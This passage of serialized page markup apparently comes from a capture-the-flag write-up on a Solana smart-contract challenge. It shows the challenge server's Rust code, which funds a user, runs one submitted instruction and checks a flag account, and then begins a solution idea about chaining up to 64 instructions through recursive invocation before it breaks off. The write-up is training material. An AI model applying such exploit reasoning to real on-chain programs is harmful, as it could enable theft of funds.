ChallengeBuilder",{"type":27,"tag":207,"props":49167,"children":49168},{"style":226},[49169],{"type":33,"value":10768},{"type":27,"tag":207,"props":49171,"children":49172},{"style":1335},[49173],{"type":33,"value":49174},"try_from",{"type":27,"tag":207,"props":49176,"children":49177},{"style":238},[49178],{"type":33,"value":1343},{"type":27,"tag":207,"props":49180,"children":49181},{"style":220},[49182],{"type":33,"value":49183},"socket",{"type":27,"tag":207,"props":49185,"children":49186},{"style":226},[49187],{"type":33,"value":1041},{"type":27,"tag":207,"props":49189,"children":49190},{"style":1335},[49191],{"type":33,"value":49192},"try_clone",{"type":27,"tag":207,"props":49194,"children":49195},{"style":238},[49196],{"type":33,"value":21155},{"type":27,"tag":207,"props":49198,"children":49199},{"style":226},[49200],{"type":33,"value":1041},{"type":27,"tag":207,"props":49202,"children":49203},{"style":1335},[49204],{"type":33,"value":10952},{"type":27,"tag":207,"props":49206,"children":49207},{"style":238},[49208],{"type":33,"value":49209},"())",{"type":27,"tag":207,"props":49211,"children":49212},{"style":226},[49213],{"type":33,"value":1041},{"type":27,"tag":207,"props":49215,"children":49216},{"style":1335},[49217],{"type":33,"value":10952},{"type":27,"tag":207,"props":49219,"children":49220},{"style":238},[49221],{"type":33,"value":4301},{"type":27,"tag":207,"props":49223,"children":49224},{"class":209,"line":244},[49225,49230,49234,49239,49243,49248,49252,49257,49261,49266,49271,49275,49280,49284,49289,49293],{"type":27,"tag":207,"props":49226,"children":49227},{"style":1335},[49228],{"type":33,"value":49229},"assert!",{"type":27,"tag":207,"props":49231,"children":49232},{"style":238},[49233],{"type":33,"value":1343},{"type":27,"tag":207,"props":49235,"children":49236},{"style":220},[49237],{"type":33,"value":49238},"builder",{"type":27,"tag":207,"props":49240,"children":49241},{"style":226},[49242],{"type":33,"value":1041},{"type":27,"tag":207,"props":49244,"children":49245},{"style":1335},[49246],{"type":33,"value":49247},"add_program",{"type":27,"tag":207,"props":49249,"children":49250},{"style":238},[49251],{"type":33,"value":1343},{"type":27,"tag":207,"props":49253,"children":49254},{"style":1325},[49255],{"type":33,"value":49256},"\"/path/to/chall.so\"",{"type":27,"tag":207,"props":49258,"children":49259},{"style":238},[49260],{"type":33,"value":1123},{"type":27,"tag":207,"props":49262,"children":49263},{"style":8920},[49264],{"type":33,"value":49265},"Some",{"type":27,"tag":207,"props":49267,"children":49268},{"style":238},[49269],{"type":33,"value":49270},"(chall",{"type":27,"tag":207,"props":49272,"children":49273},{"style":226},[49274],{"type":33,"value":10768},{"type":27,"tag":207,"props":49276,"children":49277},{"style":238},[49278],{"type":33,"value":49279},"ID)) ",{"type":27,"tag":207,"props":49281,"children":49282},{"style":226},[49283],{"type":33,"value":15856},{"type":27,"tag":207,"props":49285,"children":49286},{"style":238},[49287],{"type":33,"value":49288}," chall",{"type":27,"tag":207,"props":49290,"children":49291},{"style":226},[49292],{"type":33,"value":10768},{"type":27,"tag":207,"props":49294,"children":49295},{"style":238},[49296],{"type":33,"value":49297},"ID);\n",{"type":27,"tag":207,"props":49299,"children":49300},{"class":209,"line":270},[49301,49305,49309,49313,49317,49321,49325,49330,49334,49338,49342],{"type":27,"tag":207,"props":49302,"children":49303},{"style":214},[49304],{"type":33,"value":217},{"type":27,"tag":207,"props":49306,"children":49307},{"style":214},[49308],{"type":33,"value":10295},{"type":27,"tag":207,"props":49310,"children":49311},{"style":220},[49312],{"type":33,"value":49288},{"type":27,"tag":207,"props":49314,"children":49315},{"style":226},[49316],{"type":33,"value":229},{"type":27,"tag":207,"props":49318,"children":49319},{"style":220},[49320],{"type":33,"value":49156},{"type":27,"tag":207,"props":49322,"children":49323},{"style":226},[49324],{"type":33,"value":1041},{"type":27,"tag":207,"props":49326,"children":49327},{"style":1335},[49328],{"type":33,"value":49329},"build",{"type":27,"tag":207,"props":49331,"children":49332},{"style":238},[49333],{"type":33,"value":21155},{"type":27,"tag":207,"props":49335,"children":49336},{"style":226},[49337],{"type":33,"value":1041},{"type":27,"tag":207,"props":49339,"children":49340},{"style":376},[49341],{"type":33,"value":4173},{"type":27,"tag":207,"props":49343,"children":49344},{"style":238},[49345],{"type":33,"value":241},{"type":27,"tag":12719,"props":49347,"children":49348},{"start":244},[49349],{"type":27,"tag":1232,"props":49350,"children":49351},{},[49352],{"type":33,"value":49353},"Funds the user account with 100 SOL",{"type":27,"tag":101,"props":49355,"children":49357},{"className":10270,"code":49356,"language":10269,"meta":7,"style":7},"let user_keypair = Keypair::new();\nlet user = user_keypair.pubkey();\n\nlet payer_keypair = &chall.ctx.payer;\nlet payer = payer_keypair.pubkey();\n\nchall\n .run_ix(system_instruction::transfer(&payer, &user, 100_000_000_000))\n .await?;\n\nwriteln!(socket, \"user: {}\", user)?;\n",[49358],{"type":27,"tag":84,"props":49359,"children":49360},{"__ignoreMap":7},[49361,49394,49426,49433,49475,49507,49514,49522,49586,49605,49612],{"type":27,"tag":207,"props":49362,"children":49363},{"class":209,"line":210},[49364,49368,49373,49377,49382,49386,49390],{"type":27,"tag":207,"props":49365,"children":49366},{"style":214},[49367],{"type":33,"value":217},{"type":27,"tag":207,"props":49369,"children":49370},{"style":220},[49371],{"type":33,"value":49372}," user_keypair",{"type":27,"tag":207,"props":49374,"children":49375},{"style":226},[49376],{"type":33,"value":229},{"type":27,"tag":207,"props":49378,"children":49379},{"style":8920},[49380],{"type":33,"value":49381}," Keypair",{"type":27,"tag":207,"props":49383,"children":49384},{"style":226},[49385],{"type":33,"value":10768},{"type":27,"tag":207,"props":49387,"children":49388},{"style":1335},[49389],{"type":33,"value":22397},{"type":27,"tag":207,"props":49391,"children":49392},{"style":238},[49393],{"type":33,"value":4301},{"type":27,"tag":207,"props":49395,"children":49396},{"class":209,"line":244},[49397,49401,49406,49410,49414,49418,49422],{"type":27,"tag":207,"props":49398,"children":49399},{"style":214},[49400],{"type":33,"value":217},{"type":27,"tag":207,"props":49402,"children":49403},{"style":220},[49404],{"type":33,"value":49405}," user",{"type":27,"tag":207,"props":49407,"children":49408},{"style":226},[49409],{"type":33,"value":229},{"type":27,"tag":207,"props":49411,"children":49412},{"style":220},[49413],{"type":33,"value":49372},{"type":27,"tag":207,"props":49415,"children":49416},{"style":226},[49417],{"type":33,"value":1041},{"type":27,"tag":207,"props":49419,"children":49420},{"style":1335},[49421],{"type":33,"value":10831},{"type":27,"tag":207,"props":49423,"children":49424},{"style":238},[49425],{"type":33,"value":4301},{"type":27,"tag":207,"props":49427,"children":49428},{"class":209,"line":270},[49429],{"type":27,"tag":207,"props":49430,"children":49431},{"emptyLinePlaceholder":19},[49432],{"type":33,"value":2062},{"type":27,"tag":207,"props":49434,"children":49435},{"class":209,"line":296},[49436,49440,49445,49449,49453,49458,49462,49466,49470],{"type":27,"tag":207,"props":49437,"children":49438},{"style":214},[49439],{"type":33,"value":217},{"type":27,"tag":207,"props":49441,"children":49442},{"style":220},[49443],{"type":33,"value":49444}," payer_keypair",{"type":27,"tag":207,"props":49446,"children":49447},{"style":226},[49448],{"type":33,"value":229},{"type":27,"tag":207,"props":49450,"children":49451},{"style":226},[49452],{"type":33,"value":14423},{"type":27,"tag":207,"props":49454,"children":49455},{"style":220},[49456],{"type":33,"value":49457},"chall",{"type":27,"tag":207,"props":49459,"children":49460},{"style":226},[49461],{"type":33,"value":1041},{"type":27,"tag":207,"props":49463,"children":49464},{"style":238},[49465],{"type":33,"value":27552},{"type":27,"tag":207,"props":49467,"children":49468},{"style":226},[49469],{"type":33,"value":1041},{"type":27,"tag":207,"props":49471,"children":49472},{"style":238},[49473],{"type":33,"value":49474},"payer;\n",{"type":27,"tag":207,"props":49476,"children":49477},{"class":209,"line":445},[49478,49482,49487,49491,49495,49499,49503],{"type":27,"tag":207,"props":49479,"children":49480},{"style":214},[49481],{"type":33,"value":217},{"type":27,"tag":207,"props":49483,"children":49484},{"style":220},[49485],{"type":33,"value":49486}," payer",{"type":27,"tag":207,"props":49488,"children":49489},{"style":226},[49490],{"type":33,"value":229},{"type":27,"tag":207,"props":49492,"children":49493},{"style":220},[49494],{"type":33,"value":49444},{"type":27,"tag":207,"props":49496,"children":49497},{"style":226},[49498],{"type":33,"value":1041},{"type":27,"tag":207,"props":49500,"children":49501},{"style":1335},[49502],{"type":33,"value":10831},{"type":27,"tag":207,"props":49504,"children":49505},{"style":238},[49506],{"type":33,"value":4301},{"type":27,"tag":207,"props":49508,"children":49509},{"class":209,"line":867},[49510],{"type":27,"tag":207,"props":49511,"children":49512},{"emptyLinePlaceholder":19},[49513],{"type":33,"value":2062},{"type":27,"tag":207,"props":49515,"children":49516},{"class":209,"line":892},[49517],{"type":27,"tag":207,"props":49518,"children":49519},{"style":220},[49520],{"type":33,"value":49521},"chall\n",{"type":27,"tag":207,"props":49523,"children":49524},{"class":209,"line":1475},[49525,49530,49535,49540,49544,49548,49552,49556,49561,49565,49569,49573,49577,49582],{"type":27,"tag":207,"props":49526,"children":49527},{"style":226},[49528],{"type":33,"value":49529}," .",{"type":27,"tag":207,"props":49531,"children":49532},{"style":1335},[49533],{"type":33,"value":49534},"run_ix",{"type":27,"tag":207,"props":49536,"children":49537},{"style":238},[49538],{"type":33,"value":49539},"(system_instruction",{"type":27,"tag":207,"props":49541,"children":49542},{"style":226},[49543],{"type":33,"value":10768},{"type":27,"tag":207,"props":49545,"children":49546},{"style":1335},[49547],{"type":33,"value":39382},{"type":27,"tag":207,"props":49549,"children":49550},{"style":238},[49551],{"type":33,"value":1343},{"type":27,"tag":207,"props":49553,"children":49554},{"style":226},[49555],{"type":33,"value":10398},{"type":27,"tag":207,"props":49557,"children":49558},{"style":220},[49559],{"type":33,"value":49560},"payer",{"type":27,"tag":207,"props":49562,"children":49563},{"style":238},[49564],{"type":33,"value":1123},{"type":27,"tag":207,"props":49566,"children":49567},{"style":226},[49568],{"type":33,"value":10398},{"type":27,"tag":207,"props":49570,"children":49571},{"style":220},[49572],{"type":33,"value":27504},{"type":27,"tag":207,"props":49574,"children":49575},{"style":238},[49576],{"type":33,"value":1123},{"type":27,"tag":207,"props":49578,"children":49579},{"style":232},[49580],{"type":33,"value":49581},"100_000_000_000",{"type":27,"tag":207,"props":49583,"children":49584},{"style":238},[49585],{"type":33,"value":26983},{"type":27,"tag":207,"props":49587,"children":49588},{"class":209,"line":2065},[49589,49593,49597,49601],{"type":27,"tag":207,"props":49590,"children":49591},{"style":226},[49592],{"type":33,"value":49529},{"type":27,"tag":207,"props":49594,"children":49595},{"style":376},[49596],{"type":33,"value":4173},{"type":27,"tag":207,"props":49598,"children":49599},{"style":226},[49600],{"type":33,"value":10444},{"type":27,"tag":207,"props":49602,"children":49603},{"style":238},[49604],{"type":33,"value":241},{"type":27,"tag":207,"props":49606,"children":49607},{"class":209,"line":2092},[49608],{"type":27,"tag":207,"props":49609,"children":49610},{"emptyLinePlaceholder":19},[49611],{"type":33,"value":2062},{"type":27,"tag":207,"props":49613,"children":49614},{"class":209,"line":2130},[49615,49620,49624,49628,49632,49637,49641,49645,49649,49653],{"type":27,"tag":207,"props":49616,"children":49617},{"style":1335},[49618],{"type":33,"value":49619},"writeln!",{"type":27,"tag":207,"props":49621,"children":49622},{"style":238},[49623],{"type":33,"value":1343},{"type":27,"tag":207,"props":49625,"children":49626},{"style":220},[49627],{"type":33,"value":49183},{"type":27,"tag":207,"props":49629,"children":49630},{"style":238},[49631],{"type":33,"value":1123},{"type":27,"tag":207,"props":49633,"children":49634},{"style":1325},[49635],{"type":33,"value":49636},"\"user: {}\"",{"type":27,"tag":207,"props":49638,"children":49639},{"style":238},[49640],{"type":33,"value":1123},{"type":27,"tag":207,"props":49642,"children":49643},{"style":220},[49644],{"type":33,"value":27504},{"type":27,"tag":207,"props":49646,"children":49647},{"style":238},[49648],{"type":33,"value":10416},{"type":27,"tag":207,"props":49650,"children":49651},{"style":226},[49652],{"type":33,"value":10444},{"type":27,"tag":207,"props":49654,"children":49655},{"style":238},[49656],{"type":33,"value":241},{"type":27,"tag":12719,"props":49658,"children":49659},{"start":270},[49660],{"type":27,"tag":1232,"props":49661,"children":49662},{},[49663],{"type":33,"value":49664},"Reads an instruction from the tcp stream and executes it",{"type":27,"tag":101,"props":49666,"children":49668},{"className":10270,"code":49667,"language":10269,"meta":7,"style":7},"let solve_ix = chall.read_instruction(chall::ID)?;\nchall.run_ixs_full(&[solve_ix], &[&user_keypair], &user).await?;\n",[49669],{"type":27,"tag":84,"props":49670,"children":49671},{"__ignoreMap":7},[49672,49722],{"type":27,"tag":207,"props":49673,"children":49674},{"class":209,"line":210},[49675,49679,49684,49688,49692,49696,49701,49705,49709,49714,49718],{"type":27,"tag":207,"props":49676,"children":49677},{"style":214},[49678],{"type":33,"value":217},{"type":27,"tag":207,"props":49680,"children":49681},{"style":220},[49682],{"type":33,"value":49683}," solve_ix",{"type":27,"tag":207,"props":49685,"children":49686},{"style":226},[49687],{"type":33,"value":229},{"type":27,"tag":207,"props":49689,"children":49690},{"style":220},[49691],{"type":33,"value":49288},{"type":27,"tag":207,"props":49693,"children":49694},{"style":226},[49695],{"type":33,"value":1041},{"type":27,"tag":207,"props":49697,"children":49698},{"style":1335},[49699],{"type":33,"value":49700},"read_instruction",{"type":27,"tag":207,"props":49702,"children":49703},{"style":238},[49704],{"type":33,"value":49270},{"type":27,"tag":207,"props":49706,"children":49707},{"style":226},[49708],{"type":33,"value":10768},{"type":27,"tag":207,"props":49710,"children":49711},{"style":238},[49712],{"type":33,"value":49713},"ID)",{"type":27,"tag":207,"props":49715,"children":49716},{"style":226},[49717],{"type":33,"value":10444},{"type":27,"tag":207,"props":49719,"children":49720},{"style":238},[49721],{"type":33,"value":241},{"type":27,"tag":207,"props":49723,"children":49724},{"class":209,"line":244},[49725,49729,49733,49738,49742,49746,49750,49755,49759,49763,49767,49771,49776,49780,49784,49788,49792,49796,49800,49804],{"type":27,"tag":207,"props":49726,"children":49727},{"style":220},[49728],{"type":33,"value":49457},{"type":27,"tag":207,"props":49730,"children":49731},{"style":226},[49732],{"type":33,"value":1041},{"type":27,"tag":207,"props":49734,"children":49735},{"style":1335},[49736],{"type":33,"value":49737},"run_ixs_full",{"type":27,"tag":207,"props":49739,"children":49740},{"style":238},[49741],{"type":33,"value":1343},{"type":27,"tag":207,"props":49743,"children":49744},{"style":226},[49745],{"type":33,"value":10398},{"type":27,"tag":207,"props":49747,"children":49748},{"style":238},[49749],{"type":33,"value":11019},{"type":27,"tag":207,"props":49751,"children":49752},{"style":220},[49753],{"type":33,"value":49754},"solve_ix",{"type":27,"tag":207,"props":49756,"children":49757},{"style":238},[49758],{"type":33,"value":30333},{"type":27,"tag":207,"props":49760,"children":49761},{"style":226},[49762],{"type":33,"value":10398},{"type":27,"tag":207,"props":49764,"children":49765},{"style":238},[49766],{"type":33,"value":11019},{"type":27,"tag":207,"props":49768,"children":49769},{"style":226},[49770],{"type":33,"value":10398},{"type":27,"tag":207,"props":49772,"children":49773},{"style":220},[49774],{"type":33,"value":49775},"user_keypair",{"type":27,"tag":207,"props":49777,"children":49778},{"style":238},[49779],{"type":33,"value":30333},{"type":27,"tag":207,"props":49781,"children":49782},{"style":226},[49783],{"type":33,"value":10398},{"type":27,"tag":207,"props":49785,"children":49786},{"style":220},[49787],{"type":33,"value":27504},{"type":27,"tag":207,"props":49789,"children":49790},{"style":238},[49791],{"type":33,"value":10416},{"type":27,"tag":207,"props":49793,"children":49794},{"style":226},[49795],{"type":33,"value":1041},{"type":27,"tag":207,"props":49797,"children":49798},{"style":376},[49799],{"type":33,"value":4173},{"type":27,"tag":207,"props":49801,"children":49802},{"style":226},[49803],{"type":33,"value":10444},{"type":27,"tag":207,"props":49805,"children":49806},{"style":238},[49807],{"type":33,"value":241},{"type":27,"tag":12719,"props":49809,"children":49810},{"start":296},[49811],{"type":27,"tag":1232,"props":49812,"children":49813},{},[49814],{"type":33,"value":49815},"Checks that the account at PDA(\"FLAG\") exists, has a data length of 0x1337 and the first 8 bytes are equal to 0x4337. If so, it prints the flag.",{"type":27,"tag":101,"props":49817,"children":49819},{"className":10270,"code":49818,"language":10269,"meta":7,"style":7},"let flag = Pubkey::create_program_address(&[\"FLAG\".as_ref()], &chall::ID)?;\nif let Some(acct) = chall.ctx.banks_client.get_account(flag).await? {\n if acct.data.len() == 0x1337\n && u64::from_le_bytes(acct.data[..8].try_into().unwrap()) == 0x4337\n {\n writeln!(socket, \"congrats!\")?;\n if let Ok(flag) = env::var(\"FLAG\") {\n writeln!(socket, \"flag: {:?}\", flag)?;\n } else {\n writeln!(socket, \"flag not found, please contact admin\")?;\n }\n }\n}\n",[49820],{"type":27,"tag":84,"props":49821,"children":49822},{"__ignoreMap":7},[49823,49907,49998,50039,50123,50130,50167,50224,50269,50284,50320,50327,50334],{"type":27,"tag":207,"props":49824,"children":49825},{"class":209,"line":210},[49826,49830,49835,49839,49843,49847,49852,49856,49860,49864,49869,49873,49878,49883,49887,49891,49895,49899,49903],{"type":27,"tag":207,"props":49827,"children":49828},{"style":214},[49829],{"type":33,"value":217},{"type":27,"tag":207,"props":49831,"children":49832},{"style":220},[49833],{"type":33,"value":49834}," flag",{"type":27,"tag":207,"props":49836,"children":49837},{"style":226},[49838],{"type":33,"value":229},{"type":27,"tag":207,"props":49840,"children":49841},{"style":8920},[49842],{"type":33,"value":28129},{"type":27,"tag":207,"props":49844,"children":49845},{"style":226},[49846],{"type":33,"value":10768},{"type":27,"tag":207,"props":49848,"children":49849},{"style":1335},[49850],{"type":33,"value":49851},"create_program_address",{"type":27,"tag":207,"props":49853,"children":49854},{"style":238},[49855],{"type":33,"value":1343},{"type":27,"tag":207,"props":49857,"children":49858},{"style":226},[49859],{"type":33,"value":10398},{"type":27,"tag":207,"props":49861,"children":49862},{"style":238},[49863],{"type":33,"value":11019},{"type":27,"tag":207,"props":49865,"children":49866},{"style":1325},[49867],{"type":33,"value":49868},"\"FLAG\"",{"type":27,"tag":207,"props":49870,"children":49871},{"style":226},[49872],{"type":33,"value":1041},{"type":27,"tag":207,"props":49874,"children":49875},{"style":1335},[49876],{"type":33,"value":49877},"as_ref",{"type":27,"tag":207,"props":49879,"children":49880},{"style":238},[49881],{"type":33,"value":49882},"()], ",{"type":27,"tag":207,"props":49884,"children":49885},{"style":226},[49886],{"type":33,"value":10398},{"type":27,"tag":207,"props":49888,"children":49889},{"style":238},[49890],{"type":33,"value":49457},{"type":27,"tag":207,"props":49892,"children":49893},{"style":226},[49894],{"type":33,"value":10768},{"type":27,"tag":207,"props":49896,"children":49897},{"style":238},[49898],{"type":33,"value":49713},{"type":27,"tag":207,"props":49900,"children":49901},{"style":226},[49902],{"type":33,"value":10444},{"type":27,"tag":207,"props":49904,"children":49905},{"style":238},[49906],{"type":33,"value":241},{"type":27,"tag":207,"props":49908,"children":49909},{"class":209,"line":244},[49910,49914,49918,49922,49926,49931,49935,49939,49943,49947,49951,49955,49960,49964,49969,49973,49978,49982,49986,49990,49994],{"type":27,"tag":207,"props":49911,"children":49912},{"style":376},[49913],{"type":33,"value":9023},{"type":27,"tag":207,"props":49915,"children":49916},{"style":214},[49917],{"type":33,"value":34570},{"type":27,"tag":207,"props":49919,"children":49920},{"style":8920},[49921],{"type":33,"value":34575},{"type":27,"tag":207,"props":49923,"children":49924},{"style":238},[49925],{"type":33,"value":1343},{"type":27,"tag":207,"props":49927,"children":49928},{"style":220},[49929],{"type":33,"value":49930},"acct",{"type":27,"tag":207,"props":49932,"children":49933},{"style":238},[49934],{"type":33,"value":2222},{"type":27,"tag":207,"props":49936,"children":49937},{"style":226},[49938],{"type":33,"value":10380},{"type":27,"tag":207,"props":49940,"children":49941},{"style":220},[49942],{"type":33,"value":49288},{"type":27,"tag":207,"props":49944,"children":49945},{"style":226},[49946],{"type":33,"value":1041},{"type":27,"tag":207,"props":49948,"children":49949},{"style":238},[49950],{"type":33,"value":27552},{"type":27,"tag":207,"props":49952,"children":49953},{"style":226},[49954],{"type":33,"value":1041},{"type":27,"tag":207,"props":49956,"children":49957},{"style":238},[49958],{"type":33,"value":49959},"banks_client",{"type":27,"tag":207,"props":49961,"children":49962},{"style":226},[49963],{"type":33,"value":1041},{"type":27,"tag":207,"props":49965,"children":49966},{"style":1335},[49967],{"type":33,"value":49968},"get_account",{"type":27,"tag":207,"props":49970,"children":49971},{"style":238},[49972],{"type":33,"value":1343},{"type":27,"tag":207,"props":49974,"children":49975},{"style":220},[49976],{"type":33,"value":49977},"flag",{"type":27,"tag":207,"props":49979,"children":49980},{"style":238},[49981],{"type":33,"value":10416},{"type":27,"tag":207,"props":49983,"children":49984},{"style":226},[49985],{"type":33,"value":1041},{"type":27,"tag":207,"props":49987,"children":49988},{"style":376},[49989],{"type":33,"value":4173},{"type":27,"tag":207,"props":49991,"children":49992},{"style":226},[49993],{"type":33,"value":10444},{"type":27,"tag":207,"props":49995,"children":49996},{"style":238},[49997],{"type":33,"value":384},{"type":27,"tag":207,"props":49999,"children":50000},{"class":209,"line":270},[50001,50005,50010,50014,50018,50022,50026,50030,50034],{"type":27,"tag":207,"props":50002,"children":50003},{"style":376},[50004],{"type":33,"value":19556},{"type":27,"tag":207,"props":50006,"children":50007},{"style":220},[50008],{"type":33,"value":50009}," acct",{"type":27,"tag":207,"props":50011,"children":50012},{"style":226},[50013],{"type":33,"value":1041},{"type":27,"tag":207,"props":50015,"children":50016},{"style":238},[50017],{"type":33,"value":9468},{"type":27,"tag":207,"props":50019,"children":50020},{"style":226},[50021],{"type":33,"value":1041},{"type":27,"tag":207,"props":50023,"children":50024},{"style":1335},[50025],{"type":33,"value":16416},{"type":27,"tag":207,"props":50027,"children":50028},{"style":238},[50029],{"type":33,"value":21319},{"type":27,"tag":207,"props":50031,"children":50032},{"style":226},[50033],{"type":33,"value":15856},{"type":27,"tag":207,"props":50035,"children":50036},{"style":232},[50037],{"type":33,"value":50038}," 0x1337\n",{"type":27,"tag":207,"props":50040,"children":50041},{"class":209,"line":296},[50042,50047,50051,50055,50060,50064,50068,50072,50077,50081,50085,50089,50093,50097,50101,50105,50109,50114,50118],{"type":27,"tag":207,"props":50043,"children":50044},{"style":226},[50045],{"type":33,"value":50046}," &&",{"type":27,"tag":207,"props":50048,"children":50049},{"style":8920},[50050],{"type":33,"value":13142},{"type":27,"tag":207,"props":50052,"children":50053},{"style":226},[50054],{"type":33,"value":10768},{"type":27,"tag":207,"props":50056,"children":50057},{"style":1335},[50058],{"type":33,"value":50059},"from_le_bytes",{"type":27,"tag":207,"props":50061,"children":50062},{"style":238},[50063],{"type":33,"value":1343},{"type":27,"tag":207,"props":50065,"children":50066},{"style":220},[50067],{"type":33,"value":49930},{"type":27,"tag":207,"props":50069,"children":50070},{"style":226},[50071],{"type":33,"value":1041},{"type":27,"tag":207,"props":50073,"children":50074},{"style":238},[50075],{"type":33,"value":50076},"data[",{"type":27,"tag":207,"props":50078,"children":50079},{"style":226},[50080],{"type":33,"value":10340},{"type":27,"tag":207,"props":50082,"children":50083},{"style":232},[50084],{"type":33,"value":3578},{"type":27,"tag":207,"props":50086,"children":50087},{"style":238},[50088],{"type":33,"value":22686},{"type":27,"tag":207,"props":50090,"children":50091},{"style":226},[50092],{"type":33,"value":1041},{"type":27,"tag":207,"props":50094,"children":50095},{"style":1335},[50096],{"type":33,"value":33427},{"type":27,"tag":207,"props":50098,"children":50099},{"style":238},[50100],{"type":33,"value":21155},{"type":27,"tag":207,"props":50102,"children":50103},{"style":226},[50104],{"type":33,"value":1041},{"type":27,"tag":207,"props":50106,"children":50107},{"style":1335},[50108],{"type":33,"value":10952},{"type":27,"tag":207,"props":50110,"children":50111},{"style":238},[50112],{"type":33,"value":50113},"()) ",{"type":27,"tag":207,"props":50115,"children":50116},{"style":226},[50117],{"type":33,"value":15856},{"type":27,"tag":207,"props":50119,"children":50120},{"style":232},[50121],{"type":33,"value":50122}," 0x4337\n",{"type":27,"tag":207,"props":50124,"children":50125},{"class":209,"line":445},[50126],{"type":27,"tag":207,"props":50127,"children":50128},{"style":238},[50129],{"type":33,"value":36449},{"type":27,"tag":207,"props":50131,"children":50132},{"class":209,"line":867},[50133,50138,50142,50146,50150,50155,50159,50163],{"type":27,"tag":207,"props":50134,"children":50135},{"style":1335},[50136],{"type":33,"value":50137}," writeln!",{"type":27,"tag":207,"props":50139,"children":50140},{"style":238},[50141],{"type":33,"value":1343},{"type":27,"tag":207,"props":50143,"children":50144},{"style":220},[50145],{"type":33,"value":49183},{"type":27,"tag":207,"props":50147,"children":50148},{"style":238},[50149],{"type":33,"value":1123},{"type":27,"tag":207,"props":50151,"children":50152},{"style":1325},[50153],{"type":33,"value":50154},"\"congrats!\"",{"type":27,"tag":207,"props":50156,"children":50157},{"style":238},[50158],{"type":33,"value":10416},{"type":27,"tag":207,"props":50160,"children":50161},{"style":226},[50162],{"type":33,"value":10444},{"type":27,"tag":207,"props":50164,"children":50165},{"style":238},[50166],{"type":33,"value":241},{"type":27,"tag":207,"props":50168,"children":50169},{"class":209,"line":892},[50170,50174,50178,50183,50187,50191,50195,50199,50204,50208,50212,50216,50220],{"type":27,"tag":207,"props":50171,"children":50172},{"style":376},[50173],{"type":33,"value":10562},{"type":27,"tag":207,"props":50175,"children":50176},{"style":214},[50177],{"type":33,"value":34570},{"type":27,"tag":207,"props":50179,"children":50180},{"style":8920},[50181],{"type":33,"value":50182}," Ok",{"type":27,"tag":207,"props":50184,"children":50185},{"style":238},[50186],{"type":33,"value":1343},{"type":27,"tag":207,"props":50188,"children":50189},{"style":220},[50190],{"type":33,"value":49977},{"type":27,"tag":207,"props":50192,"children":50193},{"style":238},[50194],{"type":33,"value":2222},{"type":27,"tag":207,"props":50196,"children":50197},{"style":226},[50198],{"type":33,"value":10380},{"type":27,"tag":207,"props":50200,"children":50201},{"style":238},[50202],{"type":33,"value":50203}," env",{"type":27,"tag":207,"props":50205,"children":50206},{"style":226},[50207],{"type":33,"value":10768},{"type":27,"tag":207,"props":50209,"children":50210},{"style":1335},[50211],{"type":33,"value":1583},{"type":27,"tag":207,"props":50213,"children":50214},{"style":238},[50215],{"type":33,"value":1343},{"type":27,"tag":207,"props":50217,"children":50218},{"style":1325},[50219],{"type":33,"value":49868},{"type":27,"tag":207,"props":50221,"children":50222},{"style":238},[50223],{"type":33,"value":1424},{"type":27,"tag":207,"props":50225,"children":50226},{"class":209,"line":1475},[50227,50232,50236,50240,50244,50249,50253,50257,50261,50265],{"type":27,"tag":207,"props":50228,"children":50229},{"style":1335},[50230],{"type":33,"value":50231}," writeln!",{"type":27,"tag":207,"props":50233,"children":50234},{"style":238},[50235],{"type":33,"value":1343},{"type":27,"tag":207,"props":50237,"children":50238},{"style":220},[50239],{"type":33,"value":49183},{"type":27,"tag":207,"props":50241,"children":50242},{"style":238},[50243],{"type":33,"value":1123},{"type":27,"tag":207,"props":50245,"children":50246},{"style":1325},[50247],{"type":33,"value":50248},"\"flag: {:?}\"",{"type":27,"tag":207,"props":50250,"children":50251},{"style":238},[50252],{"type":33,"value":1123},{"type":27,"tag":207,"props":50254,"children":50255},{"style":220},[50256],{"type":33,"value":49977},{"type":27,"tag":207,"props":50258,"children":50259},{"style":238},[50260],{"type":33,"value":10416},{"type":27,"tag":207,"props":50262,"children":50263},{"style":226},[50264],{"type":33,"value":10444},{"type":27,"tag":207,"props":50266,"children":50267},{"style":238},[50268],{"type":33,"value":241},{"type":27,"tag":207,"props":50270,"children":50271},{"class":209,"line":2065},[50272,50276,50280],{"type":27,"tag":207,"props":50273,"children":50274},{"style":238},[50275],{"type":33,"value":10600},{"type":27,"tag":207,"props":50277,"children":50278},{"style":376},[50279],{"type":33,"value":10605},{"type":27,"tag":207,"props":50281,"children":50282},{"style":238},[50283],{"type":33,"value":384},{"type":27,"tag":207,"props":50285,"children":50286},{"class":209,"line":2092},[50287,50291,50295,50299,50303,50308,50312,50316],{"type":27,"tag":207,"props":50288,"children":50289},{"style":1335},[50290],{"type":33,"value":50231},{"type":27,"tag":207,"props":50292,"children":50293},{"style":238},[50294],{"type":33,"value":1343},{"type":27,"tag":207,"props":50296,"children":50297},{"style":220},[50298],{"type":33,"value":49183},{"type":27,"tag":207,"props":50300,"children":50301},{"style":238},[50302],{"type":33,"value":1123},{"type":27,"tag":207,"props":50304,"children":50305},{"style":1325},[50306],{"type":33,"value":50307},"\"flag not found, please contact admin\"",{"type":27,"tag":207,"props":50309,"children":50310},{"style":238},[50311],{"type":33,"value":10416},{"type":27,"tag":207,"props":50313,"children":50314},{"style":226},[50315],{"type":33,"value":10444},{"type":27,"tag":207,"props":50317,"children":50318},{"style":238},[50319],{"type":33,"value":241},{"type":27,"tag":207,"props":50321,"children":50322},{"class":209,"line":2130},[50323],{"type":27,"tag":207,"props":50324,"children":50325},{"style":238},[50326],{"type":33,"value":10637},{"type":27,"tag":207,"props":50328,"children":50329},{"class":209,"line":2168},[50330],{"type":27,"tag":207,"props":50331,"children":50332},{"style":238},[50333],{"type":33,"value":10645},{"type":27,"tag":207,"props":50335,"children":50336},{"class":209,"line":4095},[50337],{"type":27,"tag":207,"props":50338,"children":50339},{"style":238},[50340],{"type":33,"value":451},{"type":27,"tag":28,"props":50342,"children":50344},{"id":50343},"solution-idea",[50345],{"type":33,"value":50346},"Solution Idea",{"type":27,"tag":36,"props":50348,"children":50349},{},[50350,50352,50357],{"type":33,"value":50351},"You may think it's impossible to do with just one instruction, but we can actually leverage the ",{"type":27,"tag":84,"props":50353,"children":50355},{"className":50354},[],[50356],{"type":33,"value":42933},{"type":33,"value":50358}," function to execute infinite instructions. Well -- not entirely infinite, as we are limited by the amount of data we can pass to the on-chain program, and by the maximum stack depth of the Solana VM -- but we can execute up to 64 instructions, which is more than enough to get the flag.",{"type":27,"tag":36,"props":50360,"children":50361},{},[50362,50364,50370],{"type":33,"value":50363},"In order to 